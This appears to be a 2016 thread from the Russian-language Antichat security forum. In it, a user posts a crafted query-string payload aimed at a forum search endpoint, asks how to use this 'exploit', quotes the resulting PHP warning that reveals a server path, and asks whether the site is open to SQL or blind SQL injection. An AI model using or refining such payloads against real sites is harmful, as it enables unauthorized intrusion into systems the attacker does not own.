HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.10.2016, 14:18
zheneck221
Guest
Сообщений: n/a
Провел на форуме:
417

Репутация: 0
По умолчанию

index.php?andor_type=and&app=core&do=search&module =search&search_app=core&search_app_filters[core][searchInKey]=&search_app_filters[core][sortDir]=1&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_author=1&search_content=both&search_d ate_end=01/01/1967&search_date_start=01/01/1967&search_term=1&sid[$muciex]=1

Помогите пожалуйста правильно использовать этот exploit. При вставке кода в адресную строку на главной странице появляется Warning: substr() expects parameter 1 to be string, array given in /var/www/cerega/data/www/admin/sources/base/core.php on line 5595

Есть ли тут sql или blind sql ?
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ